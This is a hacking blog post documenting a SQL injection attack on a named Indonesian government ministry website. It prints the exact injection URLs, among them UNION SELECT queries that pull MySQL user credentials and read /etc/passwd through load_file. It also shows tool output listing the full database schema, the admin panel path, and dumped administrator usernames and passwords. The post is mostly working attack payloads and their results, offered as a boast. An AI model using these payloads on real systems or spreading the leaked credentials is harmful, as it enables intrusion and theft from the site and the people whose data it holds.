viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Friday, October 10, 2008

[SQLi] http://www.djahu.depkumham.go.id

8:44 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin loc --> http://www.djahu.depkumham.go.id/admin/
Admin pwd : [0] djahu:djahu_p2l1 [1] z3r0_vb:z3r0_vb:z3r0_vb:
[+] URL:http://www.djahu.depkumham.go.id/detail_artikel.php?artid=8+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 16:36:42
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dbHAM
User: root@localhost
Version: 5.0.45-Debian_1ubuntu3-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.djahu.depkumham.go.id/detail_artikel.php?artid=8+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.djahu.depkumham.go.id/detail_artikel.php?artid=8+AND+1=2+UNION+SELECT+0,load_file(0x2f6574632f706173737764),2,3,4,5--

[-] [16:36:43]
[-] Total URL Requests 3
[-] Done


[+] URL:http://www.djahu.depkumham.go.id/detail_artikel.php?artid=8+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 16:36:50
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dbHAM
User: root@localhost
Version: 5.0.45-Debian_1ubuntu3-log

[Database]: dbHAM
[Table: Columns]
[0]tbl_agenda: aid,ajdl,aisi,atgljam,apenulis,apic
[1]tbl_article: aid,ajdl,aisi,atgljam,apenulis,apic
[2]tbl_count: erconter
[3]tbl_ditdaktiloskopi: nid,nvisi,nmisi,nprofil,npic
[4]tbl_dithukuminternational: nid,nvisi,nmisi,nprofil,npic
[5]tbl_ditperdata: nid,nvisi,nmisi,nprofil,npic
[6]tbl_ditpidana: nid,nvisi,nmisi,nprofil,npic
[7]tbl_dittatanegara: nid,nvisi,nmisi,nprofil,npic
[8]tbl_event: eid,ejdl,eisi,etgljam,epenulis,epic
[9]tbl_faq: fid,fjdl,fisi,fpenulis,ftgljam,fpic
[10]tbl_formulir_ahu: fid,fjdl,fisi,fpenulis,ftgljam,fpic,ffile
[11]tbl_forum: nid,njdl,nisi,ntgljam,npenulis,npic
[12]tbl_halamanutamaadmin: id,isi
[13]tbl_kewenangan: id,isi
[14]tbl_lapbul: nid,njdl,nisi,ntgljam,npenulis,npic,groupdit,setuju,subdit
[15]tbl_lapbulanan: id,jns_kegiatan,spbs,permohonanbaru,jmlpermohonan,ygdiselesaikan,sisapermohonan,ket,tgl,groupdit,setuju,subdit
[16]tbl_link: lid,llink,lket
[17]tbl_news: nid,njdl,nisi,ntgljam,npenulis,npic
[18]tbl_pelayanan_jasa_hum: jid,jjdl,jisi,jtgljam,jpenulis,jpic
[19]tbl_pengaduan_masyarakat: sid,skpd,snm,salamat,skota,skdpos,spropinsi,stlp,sfax,semail,stgl,spesan
[20]tbl_peraturan: ppid,ppjdl,ppisi,pptgljam,pppenulis,pppic
[21]tbl_perpustakaan: pid,pjdl,ppenulis,pthn,pisbn
[22]tbl_perusahaan: pid,pnmperu,palamat
[23]tbl_polling2: poll_title,result
[24]tbl_profile: id,nip,nama,jabatan,pic
[25]tbl_renstra: id,isi
[26]tbl_saraninfo: sid,skpd,snm,skanwil,salamat,skota,skdpos,spropinsi,snegara,stlp,sfax,semail,stgl,spesan,snmfile
[27]tbl_sejarah: id,isi
[28]tbl_sekditjen: nid,nvisi,nmisi,nprofil,npic
[29]tbl_statistik: sid,sjdl,sisi,stgljam,spenulis,spic
[30]tbl_struktur_org: id,pic
[31]tbl_tupoksi: id,isi
[32]tbl_visimisi: id,isi
[33]tbladmin: Ausername,Apassword,Anip,Anm,Ahakakses,Ajabatan,Aonline
[34]tbluser: FUser,FPass,FEmail,FTglreg,FTglon,FKelamin,FNama,FAalamat,FTelepon,FStatus,FTahun,fteleponXX,FAlamatXX,FEmailXX,FTmptlhr,FTgllahir,FTgllahirXX,FOn,Fdeskripsi

[Database]: mysql
[Table: Columns]
[0]columns_priv: Host,Db,User,Table_name,Column_name,Timestamp,Column_priv
[1]db: Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[2]func: name,ret,dl,type
[3]help_category: help_category_id,name,parent_category_id,url
[4]help_keyword: help_keyword_id,name
[5]help_relation: help_topic_id,help_keyword_id
[6]help_topic: help_topic_id,name,help_category_id,description,example,url
[7]host: Host,Db,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[8]proc: db,name,type,specific_name,language,sql_data_access,is_deterministic,security_type,param_list,returns,body,definer,created,modified,sql_mode,comment
[9]procs_priv: Host,Db,User,Routine_name,Routine_type,Grantor,Proc_priv,Timestamp
[10]tables_priv: Host,Db,User,Table_name,Grantor,Timestamp,Table_priv,Column_priv
[11]time_zone: Time_zone_id,Use_leap_seconds
[12]time_zone_leap_second: Transition_time,Correction
[13]time_zone_name: Name,Time_zone_id
[14]time_zone_transition: Time_zone_id,Transition_time,Transition_type_id
[15]time_zone_transition_type: Time_zone_id,Transition_type_id,Offset,Is_DST,Abbreviation
[16]user: Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections

[-] [16:38:32]
[-] Total URL Requests 347
[-] Done


[+] URL:http://www.djahu.depkumham.go.id/detail_artikel.php?artid=8+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 16:40:40
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dbHAM
User: root@localhost
Version: 5.0.45-Debian_1ubuntu3-log
[+] Dumping data from database "dbHAM" Table "tbladmin"
[+] Column(s) ['Ausername', 'Apassword']
[+] Number of Rows: 2

[0] djahu:djahu_p2l1:
[1] z3r0_vb:z3r0_vb:z3r0_vb:

[-] [16:40:42]
[-] Total URL Requests 4
[-] Done

0 comments:

Post a Comment